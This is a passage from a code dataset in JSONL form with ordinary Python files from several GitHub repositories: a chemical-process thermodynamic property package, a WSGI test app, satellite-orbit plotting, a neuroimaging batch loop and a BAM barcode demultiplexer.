b._teq / b._params.temperature_crit[i]\n self._tr_eq = Expression(\n self._params.component_list,\n rule=rule_tr_eq,\n doc='Component reduced temperatures')\n\n def rule_equilibrium(b, i):\n return b.fug_vap_comp[i] == b.fug_liq_comp[i]\n self.equilibrium_constraint = Constraint(\n self._params.component_list, rule=rule_equilibrium)\n\n# -----------------------------------------------------------------------------\n# Property Methods\n def _dens_mol_phase(self):\n self.dens_mol_phase = Var(self._params.phase_list,\n initialize=1.0,\n units=pyunits.mol*pyunits.m**-3,\n doc=\"Molar density\")\n\n def rule_dens_mol_phase(b, p):\n if p == 'Vap':\n return b._dens_mol_vap()\n else:\n return b._dens_mol_liq()\n self.eq_dens_mol_phase = Constraint(self._params.phase_list,\n rule=rule_dens_mol_phase)\n\n def _energy_internal_mol_phase_comp(self):\n self.energy_internal_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n units=pyunits.J/pyunits.mol,\n doc=\"Phase-component molar specific internal energies\")\n\n def rule_energy_internal_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b.energy_internal_mol_phase_comp[p, j] == \\\n b.enth_mol_phase_comp[p, j] - \\\n const.gas_constant*(b.temperature -\n b._params.temeprature_ref)\n else:\n return b.energy_internal_mol_phase_comp[p, j] == \\\n b.enth_mol_phase_comp[p, j]\n self.eq_energy_internal_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_energy_internal_mol_phase_comp)\n\n def _energy_internal_mol_phase(self):\n self.energy_internal_mol_phase = Var(\n self._params.phase_list,\n units=pyunits.J/pyunits.mol,\n doc='Phase molar specific internal energies')\n\n def rule_energy_internal_mol_phase(b, p):\n return b.energy_internal_mol_phase[p] == sum(\n b.energy_internal_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_energy_internal_mol_phase = Constraint(\n self._params.phase_list,\n 
rule=rule_energy_internal_mol_phase)\n\n def _enth_mol_phase_comp(self):\n self.enth_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n initialize=7e5,\n units=pyunits.J/pyunits.mol,\n doc='Phase-component molar specific enthalpies')\n\n def rule_enth_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b._enth_mol_comp_vap(j)\n else:\n return b._enth_mol_comp_liq(j)\n self.eq_enth_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_enth_mol_phase_comp)\n\n def _enth_mol_phase(self):\n self.enth_mol_phase = Var(\n self._params.phase_list,\n initialize=7e5,\n units=pyunits.J/pyunits.mol,\n doc='Phase molar specific enthalpies')\n\n def rule_enth_mol_phase(b, p):\n return b.enth_mol_phase[p] == sum(\n b.enth_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_enth_mol_phase = Constraint(self._params.phase_list,\n rule=rule_enth_mol_phase)\n\n def _entr_mol_phase_comp(self):\n self.entr_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc='Phase-component molar specific entropies')\n\n def rule_entr_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b._entr_mol_comp_vap(j)\n else:\n return b._entr_mol_comp_liq(j)\n self.eq_entr_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_entr_mol_phase_comp)\n\n def _entr_mol_phase(self):\n self.entr_mol_phase = Var(\n self._params.phase_list,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc='Phase molar specific enthropies')\n\n def rule_entr_mol_phase(b, p):\n return b.entr_mol_phase[p] == sum(\n b.entr_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_entr_mol_phase = Constraint(self._params.phase_list,\n rule=rule_entr_mol_phase)\n\n# -----------------------------------------------------------------------------\n# General Methods\n 
def get_material_flow_terms(self, p, j):\n \"\"\"Create material flow terms for control volume.\"\"\"\n if not self.is_property_constructed(\"material_flow_terms\"):\n try:\n def rule_material_flow_terms(blk, p, j):\n return blk.flow_mol_phase_comp[p, j]\n self.material_flow_terms = Expression(\n self.params.phase_list,\n self.params.component_list,\n rule=rule_material_flow_terms\n )\n except AttributeError:\n self.del_component(self.material_flow_terms)\n\n if j in self.params.component_list:\n return self.material_flow_terms[p, j]\n else:\n return 0\n\n def get_enthalpy_flow_terms(self, p):\n \"\"\"Create enthalpy flow terms.\"\"\"\n if not self.is_property_constructed(\"enthalpy_flow_terms\"):\n try:\n def rule_enthalpy_flow_terms(blk, p):\n return blk.flow_mol_phase[p] * blk.enth_mol_phase[p]\n self.enthalpy_flow_terms = Expression(\n self.params.phase_list,\n rule=rule_enthalpy_flow_terms\n )\n except AttributeError:\n self.del_component(self.enthalpy_flow_terms)\n return self.enthalpy_flow_terms[p]\n\n def get_material_density_terms(self, p, j):\n \"\"\"Create material density terms.\"\"\"\n if not self.is_property_constructed(\"material_density_terms\"):\n try:\n def rule_material_density_terms(b, p, j):\n return self.dens_mol_phase[p] * \\\n self.mole_frac_phase_comp[p, j]\n self.material_density_terms = Expression(\n self.params.phase_list,\n self.params.component_list,\n rule=rule_material_density_terms\n )\n except AttributeError:\n self.del_component(self.material_density_terms)\n\n if j in self.params.component_list:\n return self.material_density_terms[p, j]\n else:\n return 0\n\n def get_enthalpy_density_terms(self, p):\n \"\"\"Create energy density terms.\"\"\"\n if not self.is_property_constructed(\"enthalpy_density_terms\"):\n try:\n def rule_energy_density_terms(b, p):\n return (self.dens_mol_phase[p] *\n self.energy_internal_mol_phase[p])\n self.energy_density_terms = Expression(\n self.params.phase_list,\n rule=rule_energy_density_terms\n )\n 
except AttributeError:\n self.del_component(self.energy_density_terms)\n return self.enthalpy_density_terms[p]\n\n def default_material_balance_type(self):\n return MaterialBalanceType.componentPhase\n\n def default_energy_balance_type(self):\n return EnergyBalanceType.enthalpyTotal\n\n def get_material_flow_basis(b):\n return MaterialFlowBasis.molar\n\n def define_state_vars(self):\n \"\"\"Define state vars.\"\"\"\n return {\"flow_mol_phase_comp\": self.flow_mol_phase_comp,\n \"temperature\": self.temperature,\n \"pressure\": self.pressure}\n\n # Property package utility functions\n def calculate_bubble_point_temperature(self, clear_components=True):\n \"\"\"\"To compute the bubble point temperature of the mixture.\"\"\"\n\n if hasattr(self, \"eq_temperature_bubble\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.temperature_bubble,\n self.eq_temperature_bubble)\n\n return self.temperature_bubble.value\n\n if clear_components is True:\n self.del_component(self.eq_temperature_bubble)\n self.del_component(self._p_sat_bubbleT)\n self.del_component(self.temperature_bubble)\n\n def calculate_dew_point_temperature(self, clear_components=True):\n \"\"\"\"To compute the dew point temperature of the mixture.\"\"\"\n\n if hasattr(self, \"eq_temperature_dew\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.temperature_dew,\n self.eq_temperature_dew)\n\n return self.temperature_dew.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_temperature_dew)\n self.del_component(self._p_sat_dewT)\n self.del_component(self.temperature_dew)\n\n def calculate_bubble_point_pressure(self, clear_components=True):\n \"\"\"\"To compute the bubble point pressure of the 
mixture.\"\"\"\n\n if hasattr(self, \"eq_pressure_bubble\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.pressure_bubble,\n self.eq_pressure_bubble)\n\n return self.pressure_bubble.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_pressure_bubble)\n self.del_component(self._p_sat_bubbleP)\n self.del_component(self.pressure_bubble)\n\n def calculate_dew_point_pressure(self, clear_components=True):\n \"\"\"\"To compute the dew point pressure of the mixture.\"\"\"\n\n if hasattr(self, \"eq_pressure_dew\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.pressure_dew,\n self.eq_pressure_dew)\n\n return self.pressure_dew.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_pressure_dew)\n self.del_component(self._p_sat_dewP)\n self.del_component(self.pressure_dew)\n\n# -----------------------------------------------------------------------------\n# Bubble and Dew Points\n# Ideal-Ideal properties allow for the simplifications below\n# Other methods require more complex equations with shadow compositions\n\n# For future work, propose the following:\n# Core class writes a set of constraints Phi_L_i == Phi_V_i\n# Phi_L_i and Phi_V_i make calls to submethods which add shadow compositions\n# as needed\n def _temperature_bubble(self):\n self.temperature_bubble = Param(initialize=33.0,\n units=pyunits.K,\n doc=\"Bubble point temperature\")\n\n def _temperature_dew(self):\n\n self.temperature_dew = Var(initialize=298.15,\n units=pyunits.K,\n doc=\"Dew point temperature\")\n\n def rule_psat_dew(b, j):\n return 
1e5*pyunits.Pa*10**(b._params.pressure_sat_coeff_A[j] -\n b._params.pressure_sat_coeff_B[j] /\n (b.temperature_dew +\n b._params.pressure_sat_coeff_C[j]))\n\n try:\n # Try to build expression\n self._p_sat_dewT = Expression(self._params.component_list,\n rule=rule_psat_dew)\n\n def rule_temp_dew(b):\n return b.pressure * sum(b.mole_frac_comp[i] /\n b._p_sat_dewT[i]\n for i in ['toluene', 'benzene']) \\\n - 1 == 0\n self.eq_temperature_dew = Constraint(rule=rule_temp_dew)\n except AttributeError:\n # If expression fails, clean up so that DAE can try again later\n # Deleting only var/expression as expression construction will fail\n # first; if it passes then constraint construction will not fail.\n self.del_component(self.temperature_dew)\n self.del_component(self._p_sat_dewT)\n\n def _pressure_bubble(self):\n self.pressure_bubble = Param(initialize=1e8,\n units=pyunits.Pa,\n doc=\"Bubble point pressure\")\n\n def _pressure_dew(self):\n self.pressure_dew = Var(initialize=298.15,\n units=pyunits.Pa,\n doc=\"Dew point pressure\")\n\n def rule_psat_dew(b, j):\n return 1e5*pyunits.Pa*10**(b._params.pressure_sat_coeff_A[j] -\n b._params.pressure_sat_coeff_B[j] /\n (b.temperature +\n b._params.pressure_sat_coeff_C[j]))\n\n try:\n # Try to build expression\n self._p_sat_dewP = Expression(self._params.component_list,\n rule=rule_psat_dew)\n\n def rule_pressure_dew(b):\n return b.pressure_dew * \\\n sum(b.mole_frac_comp[i] / b._p_sat_dewP[i]\n for i in ['toluene', 'benzene']) \\\n - 1 == 0\n self.eq_pressure_dew = Constraint(rule=rule_pressure_dew)\n except AttributeError:\n # If expression fails, clean up so that DAE can try again later\n # Deleting only var/expression as expression construction will fail\n # first; if it passes then constraint construction will not fail.\n self.del_component(self.pressure_dew)\n self.del_component(self._p_sat_dewP)\n\n# -----------------------------------------------------------------------------\n# Liquid phase properties\n def 
_dens_mol_liq(b):\n return b.dens_mol_phase['Liq'] == 1e3*sum(\n b.mole_frac_phase_comp['Liq', j] *\n b._params.dens_liq_param_1[j] /\n b._params.dens_liq_param_2[j] **\n (1 + (1-b.temperature /\n b._params.dens_liq_param_3[j]) **\n b._params.dens_liq_param_4[j])\n for j in ['benzene', 'toluene'])\n\n def _fug_liq_comp(self):\n def fug_liq_comp_rule(b, i):\n if i in ['hydrogen', 'methane']:\n return b.mole_frac_phase_comp['Liq', i]\n else:\n return b.pressure_sat[i] * b.mole_frac_phase_comp['Liq', i]\n self.fug_liq_comp = Expression(self._params.component_list,\n rule=fug_liq_comp_rule)\n\n def _pressure_sat(self):\n self.pressure_sat = Var(self._params.component_list,\n initialize=101325,\n units=pyunits.Pa,\n doc=\"Vapor pressure\")\n\n def rule_P_sat(b, j):\n return ((log10(b.pressure_sat[j]/pyunits.Pa*1e-5) -\n b._params.pressure_sat_coeff_A[j]) *\n (b._teq + b._params.pressure_sat_coeff_C[j])) == \\\n -b._params.pressure_sat_coeff_B[j]\n self.eq_pressure_sat = Constraint(self._params.component_list,\n rule=rule_P_sat)\n\n def _enth_mol_comp_liq(b, j):\n return b.enth_mol_phase_comp['Liq', j] * 1E3 == \\\n ((b._params.cp_ig_5['Liq', j] / 5) *\n (b.temperature**5 - b._params.temperature_ref**5)\n + (b._params.cp_ig_4['Liq', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_3['Liq', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_2['Liq', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_1['Liq', j] *\n (b.temperature - b._params.temperature_ref))\n\n def _entr_mol_comp_liq(b, j):\n return b.entr_mol_phase_comp['Liq', j] * 1E3 == (\n ((b._params.cp_ig_5['Liq', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_4['Liq', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_3['Liq', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_2['Liq', j] *\n (b.temperature - 
b._params.temperature_ref)\n + b._params.cp_ig_1['Liq', j] *\n log(b.temperature / b._params.temperature_ref)) -\n const.gas_constant *\n log(b.mole_frac_phase_comp['Liq', j]*b.pressure /\n b._params.pressure_ref))\n\n# -----------------------------------------------------------------------------\n# Vapour phase properties\n def _dens_mol_vap(b):\n return b.pressure == (b.dens_mol_phase['Vap'] *\n const.gas_constant *\n b.temperature)\n\n def _fug_vap_comp(self):\n def fug_vap_comp_rule(b, i):\n if i in ['hydrogen', 'methane']:\n return 1e-6\n else:\n return b.mole_frac_phase_comp['Vap', i] * b.pressure\n self.fug_vap_comp = Expression(self._params.component_list,\n rule=fug_vap_comp_rule)\n\n def _dh_vap(self):\n # heat of vaporization\n add_object_reference(self, \"dh_vap\",\n self._params.dh_vap)\n\n def _ds_vap(self):\n # entropy of vaporization = dh_Vap/T_boil\n # TODO : something more rigorous would be nice\n self.ds_vap = Var(self._params.component_list,\n initialize=86,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc=\"Entropy of vaporization\")\n\n def rule_ds_vap(b, j):\n return b.dh_vap[j] == (b.ds_vap[j] *\n b._params.temperature_boil[j])\n self.eq_ds_vap = Constraint(self._params.component_list,\n rule=rule_ds_vap)\n\n def _enth_mol_comp_vap(b, j):\n return b.enth_mol_phase_comp['Vap', j] == b.dh_vap[j] + \\\n ((b._params.cp_ig_5['Vap', j] / 5) *\n (b.temperature**5 - b._params.temperature_ref**5)\n + (b._params.cp_ig_4['Vap', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_3['Vap', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_2['Vap', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_1['Vap', j] *\n (b.temperature - b._params.temperature_ref))\n\n def _entr_mol_comp_vap(b, j):\n return b.entr_mol_phase_comp['Vap', j] == (\n b.ds_vap[j] +\n ((b._params.cp_ig_5['Vap', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + 
(b._params.cp_ig_4['Vap', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_3['Vap', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_2['Vap', j] *\n (b.temperature - b._params.temperature_ref)\n + b._params.cp_ig_1['Vap', j] *\n log(b.temperature / b._params.temperature_ref)) -\n const.gas_constant *\n log(b.mole_frac_phase_comp['Vap', j]*b.pressure /\n b._params.pressure_ref))\n\n def calculate_scaling_factors(self):\n # Get default scale factors\n super().calculate_scaling_factors()\n\n is_two_phase = len(self._params.phase_list) == 2\n sf_flow = iscale.get_scaling_factor(\n self.flow_mol, default=1, warning=True)\n sf_T = iscale.get_scaling_factor(\n self.temperature, default=1, warning=True)\n sf_P = iscale.get_scaling_factor(\n self.pressure, default=1, warning=True)\n\n if self.is_property_constructed(\"_teq\"):\n iscale.set_scaling_factor(self._teq, sf_T)\n if self.is_property_constructed(\"_teq_constraint\"):\n iscale.constraint_scaling_transform(\n self._teq_constraint, sf_T, overwrite=False)\n\n if self.is_property_constructed(\"_t1\"):\n iscale.set_scaling_factor(self._t1, sf_T)\n if self.is_property_constructed(\"_t1_constraint\"):\n iscale.constraint_scaling_transform(\n self._t1_constraint, sf_T, overwrite=False)\n\n if self.is_property_constructed(\"_mole_frac_pdew\"):\n iscale.set_scaling_factor(self._mole_frac_pdew, 1e3)\n iscale.constraint_scaling_transform(\n self._sum_mole_frac_pdew, 1e3, overwrite=False)\n\n if self.is_property_constructed(\"total_flow_balance\"):\n iscale.constraint_scaling_transform(\n self.total_flow_balance, sf_flow, overwrite=False)\n\n if self.is_property_constructed(\"component_flow_balances\"):\n for i, c in self.component_flow_balances.items():\n if is_two_phase:\n s = iscale.get_scaling_factor(\n self.mole_frac_comp[i], default=1, warning=True)\n s *= sf_flow\n iscale.constraint_scaling_transform(c, s, overwrite=False)\n else:\n s = 
iscale.get_scaling_factor(\n self.mole_frac_comp[i], default=1, warning=True)\n iscale.constraint_scaling_transform(c, s, overwrite=False)\n\n if self.is_property_constructed(\"dens_mol_phase\"):\n for c in self.eq_dens_mol_phase.values():\n iscale.constraint_scaling_transform(c, sf_P, overwrite=False)\n\n if self.is_property_constructed(\"dens_mass_phase\"):\n for p, c in self.eq_dens_mass_phase.items():\n sf = iscale.get_scaling_factor(\n self.dens_mass_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"enth_mol_phase\"):\n for p, c in self.eq_enth_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.enth_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"enth_mol\"):\n sf = iscale.get_scaling_factor(\n self.enth_mol, default=1, warning=True)\n sf *= sf_flow\n iscale.constraint_scaling_transform(\n self.eq_enth_mol, sf, overwrite=False)\n\n if self.is_property_constructed(\"entr_mol_phase\"):\n for p, c in self.eq_entr_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.entr_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"entr_mol\"):\n sf = iscale.get_scaling_factor(\n self.entr_mol, default=1, warning=True)\n sf *= sf_flow\n iscale.constraint_scaling_transform(\n self.eq_entr_mol, sf, overwrite=False)\n\n if self.is_property_constructed(\"gibbs_mol_phase\"):\n for p, c in self.eq_gibbs_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.gibbs_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, 
overwrite=False)\n","repo_name":"IDAES/examples-pse","sub_path":"pkg/idaes_examples/common/hda/hda_ideal_VLE.py","file_name":"hda_ideal_VLE.py","file_ext":"py","file_size_in_byte":54495,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"39685869627","text":"import json\n\nfrom six.moves.urllib import parse as urlparse\n\n\nMETHODS = ['GET', 'PUT', 'POST', 'DELETE', 'PATCH']\n\n\nclass SimpleWsgi(object):\n \"\"\"A simple wsgi application to use in tests.\"\"\"\n\n def __call__(self, environ, start_response):\n request_method = environ['REQUEST_METHOD'].upper()\n query_data = urlparse.parse_qs(environ.get('QUERY_STRING', ''))\n request_url = environ.get('REQUEST_URI',\n environ.get('RAW_URI', 'unknown'))\n accept_header = environ.get('HTTP_ACCEPT')\n content_type_header = environ.get('CONTENT_TYPE', '')\n\n request_url = self._fully_qualify(environ, request_url)\n\n if accept_header:\n response_content_type = accept_header\n else:\n response_content_type = 'application/json'\n\n headers = [\n ('X-Gabbi-method', request_method),\n ('Content-Type', response_content_type),\n ('X-Gabbi-url', request_url),\n ]\n\n if request_method == 'DIE':\n raise Exception('because you asked me to')\n\n if request_method not in METHODS:\n headers.append(\n ('Allow', ', '.join(METHODS)))\n start_response('405 Method Not Allowed', headers)\n return []\n\n if request_method.startswith('P'):\n body = environ['wsgi.input'].read()\n if body:\n if not content_type_header:\n start_response('400 Bad request', headers)\n return []\n if content_type_header == 'application/json':\n body_data = json.loads(body.decode('utf-8'))\n if query_data:\n query_data.update(body_data)\n else:\n query_data = body_data\n headers.append(('Location', request_url))\n\n start_response('200 OK', headers)\n\n query_output = json.dumps(query_data)\n return [query_output.encode('utf-8')]\n\n @staticmethod\n def _fully_qualify(environ, url):\n \"\"\"Turn a 
URL path into a fully qualified URL.\"\"\"\n path, query, fragment = urlparse.urlsplit(url)[2:]\n server_name = environ.get('SERVER_NAME')\n server_port = environ.get('SERVER_PORT')\n server_scheme = environ.get('wsgi.url_scheme')\n if server_port not in ['80', '443']:\n netloc = '%s:%s' % (server_name, server_port)\n else:\n netloc = server_name\n\n return urlparse.urlunsplit((server_scheme, netloc, path,\n query, fragment))\n","repo_name":"sugaryog/clearlinux","sub_path":"gabbi-0.99.1/gabbi/simple_wsgi.py","file_name":"simple_wsgi.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19850603092","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plotWithAnnotate(results):\n x = results[:,4]\n y = results[:,5]\n alt = results[:,0]\n sats = results[:,1]\n planes = results[:,2]\n #f = results[:,3]\n names = []\n for i in range(len(results)):\n names.append(\"%ikm:(%i,%i,%i)\"%(alt[i],sats[i],planes[i],1))\n \n c = planes\n norm = plt.Normalize(np.amin(c),np.amax(c))\n cmap = plt.cm.PuOr_r\n\n fig,ax = plt.subplots()\n sc = plt.scatter(x,y,c=c,cmap=cmap,norm=norm)\n cb = plt.colorbar(orientation='vertical')\n cb.set_label(label=\"Planes\",size=30)\n cb.ax.tick_params(labelsize=20)\n annot = ax.annotate(\"\", xy=(0,0), xytext=(20,20),textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"w\"),\n arrowprops=dict(arrowstyle=\"->\"))\n annot.set_visible(False)\n \n \n def perm_annot(ind):\n #pos = []\n for i in range(len(ind)):\n annot = ax.annotate(\"\", xy=(0,0), xytext=(-40,-40),textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"w\"),\n arrowprops=dict(arrowstyle=\"->\"))\n pos = sc.get_offsets()[ind[i]]\n annot.xy = pos\n #text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))), \n # \" \".join([names[n] for n in ind[\"ind\"]]))\n text = \"{}\".format(\" \".join([names[ind[i]]]))\n annot.set_text(text)\n 
#annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n annot.set_visible(True)\n\n def update_annot(ind):\n \n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n #text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))), \n # \" \".join([names[n] for n in ind[\"ind\"]]))\n text = \"{}\".format(\" \".join([names[n] for n in ind[\"ind\"]]))\n annot.set_text(text)\n #annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n \n allind = [48,26,13,774]\n\n perm_annot(allind)\n fig.canvas.draw_idle()\n \n def hover(event):\n vis = annot.get_visible()\n if event.inaxes == ax:\n cont, ind = sc.contains(event)\n print(ind)\n #for n in ind[\"ind\"]:\n # allind[\"ind\"].append(n)\n if cont:\n update_annot(ind)\n annot.set_visible(True)\n fig.canvas.draw_idle()\n else:\n if vis:\n #annot.set_visible(False)\n fig.canvas.draw_idle()\n\n #fig.canvas.mpl_connect(\"motion_notify_event\", hover)\n fig.canvas.mpl_connect(\"button_press_event\",hover)\n \n \n plt.suptitle(\"Cost (USD) vs Revisit Time (Hrs) for different constellations\",size=40)\n plt.xlabel(\"Revist Time (hr)\",size=30)\n plt.ylabel(\"Cost (USD)\",size=30)\n plt.show()\n\ndef readCSV():\n data = []\n f = open(\"results.csv\",'r')\n lines = f.readlines()\n for line in lines:\n row = line.strip('\\n').split(',')\n trow = []\n for i in row:\n trow.append(float(i))\n data.append(trow)\n\n return np.array(data)\n\n\n\ndef SSOinclination(alt:float) -> float:\n \"\"\"\n SSO inclination will return the required Sun-Synchronous Inclination (degrees) as a functino of altitude (in KM) using J2 pertubation\n Inputs:\n -Altitude in KM\n Output:\n -Inclination in degrees\n \"\"\"\n from math import pi,sqrt,acos\n Re = 6378.1 #Radius of Earth in KM\n mu = 3.986e14 #Mu of earth in m^3/s^2\n\n J2 = 1.08262668e-3\n omegaDot = 2*pi/365/86400\n\n a = (alt+Re)*1000\n n = sqrt(mu/pow(a,3))\n return acos(-2/3 * 
omegaDot/n/J2 * pow(a/Re/1000,2))*180/pi\n#print(SSOinclination(500))\nresults = (readCSV())\n\nAltFront = [[500,10,5],[500,7,7],[500,5,5],[750,3,3]]\nci = []\nFront = AltFront\nfor point in Front:\n Awhere = np.argwhere(results[:,0]==point[0])\n Swhere = np.argwhere(results[:,1]==point[1])\n Pwhere = np.argwhere(results[:,2]==point[2])\n ascom = []\n aspcom = []\n for a in Awhere:\n for s in Swhere:\n if a ==s:\n ascom.append(a)\n for c in ascom:\n for p in Pwhere:\n if c==p:\n aspcom.append(c)\n ci.append(aspcom)\n\n\nprint(ci)\n\nplotWithAnnotate(results)","repo_name":"JasonSaladiner/3D-CHESS","sub_path":"3D-CHESS Software/Orbit Selection/OrbitSelectionGraphing.py","file_name":"OrbitSelectionGraphing.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35504837509","text":"import os\nfrom glob import glob\nimport pennlinckit\n\nsubs = sorted(glob('/cbica/projects/ISTAGING_FMRI/datasets/*/fmriprep/*'))\nsubids = [os.path.split(x)[1] for x in subs]\nfprep_dirs = [os.path.split(x)[0] for x in subs]\nxcp_dirs = [os.path.join(os.path.split(x)[0],'xcp') for x in fprep_dirs]\n\nsubid = subids[pennlinckit.utils.get_sge_task_id()]\nfpdir = fprep_dirs[pennlinckit.utils.get_sge_task_id()]\nxcpdir = xcp_dirs[pennlinckit.utils.get_sge_task_id()]\n\ncmd = 'singularity run -B /cbica/projects/ISTAGING_FMRI/:/home/user/data/ ~/xcpabcd.simg %s %s participant --participant_label %s --despike -p 36P --lower-bpf 0.01 --upper-bpf 0.08'%(fpdir,xcpdir,subid)\nos.system(cmd)\n","repo_name":"PennLINC/iStaging_fmri","sub_path":"XCP_subloop.py","file_name":"XCP_subloop.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12989828114","text":"import pysam\nimport os\nimport argparse\nimport pandas as pd\nparser = argparse.ArgumentParser()\nparser.add_argument('-b', '--bam', type=str,\n 
help='bam input')\nparser.add_argument('-o', '--output', type=str,\n help='output file directory')\nparser.add_argument('-t', '--tag', type=str,\n help='BAM tag')\nparser.add_argument('-r', '--reference', type=str,\n help='Input barcode list')\n\n\n\nif __name__ == \"__main__\":\n # parsing arguments\n args = parser.parse_args()\n input_file = pysam.AlignmentFile(args.bam)\n outdir = args.output;\n prefix = args.bam.split('/')[-1].split(\".bam\")[0]\n barcode_list = args.reference\n barcode_list = set(list(pd.read_csv(barcode_list, header=None).iloc[:,0]))\n tag = args.tag\n\n created_sam = set()\n opened_sam = {}\n opened_sam_queue = []\n max_queue_length = 100\n\n\n for read in input_file.fetch():\n name = int(read.qname.split(\".\")[-1])\n bam_fp = None\n try:\n barcode = read.get_tag(tag)\n except KeyError:\n continue\n if barcode not in barcode_list:\n continue\n if barcode not in opened_sam.keys():\n if len(opened_sam_queue) == max_queue_length:\n poped_name = opened_sam_queue.pop()\n fp = opened_sam.pop(poped_name)\n fp.close()\n if barcode not in created_sam:\n opened_sam[barcode] = pysam.AlignmentFile(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), 'w', template = input_file)\n opened_sam[barcode].close()\n opened_sam[barcode] = open(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), \"a\")\n created_sam.add(barcode)\n else:\n opened_sam[barcode] = open(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), \"a\")\n opened_sam_queue.append(barcode)\n\n bam_fp = opened_sam[barcode]\n bam_fp.write(read.to_string()+'\\n')\n\n for fp in opened_sam.values():\n fp.close()\n for out_sam in os.listdir(outdir):\n pysam.sort(\"-o\", os.path.join(outdir,out_sam.replace(\"sam\",\"bam\")), os.path.join(outdir,out_sam))\n os.system(\"rm \" + 
os.path.join(outdir,out_sam))","repo_name":"WanluLiuLab/Benchmarking_TCR_Reconstruction","sub_path":"Split_data_code/demultiplex_bam.py","file_name":"demultiplex_bam.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15800929225","text":"import os\nimport time\nimport datetime\nfrom tqdm import tqdm\nimport torch\nimport torchinfo\nimport numpy as np\nimport multiprocessing\nimport pytorch_lightning as pl \nfrom pytorch_lightning import loggers as pl_loggers\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom argparse import ArgumentParser\nfrom model import AutoEncoder\nfrom autoencoder_datamodule import AutoEncoderDataModule\nfrom utils_pt import unnormalize, emd\n\n# get date and time to save model\ndt = datetime.datetime.today()\nyear = dt.year\nmonth = dt.month\nday = dt.day\nhour = dt.hour\nminute = dt.minute\nsecond = 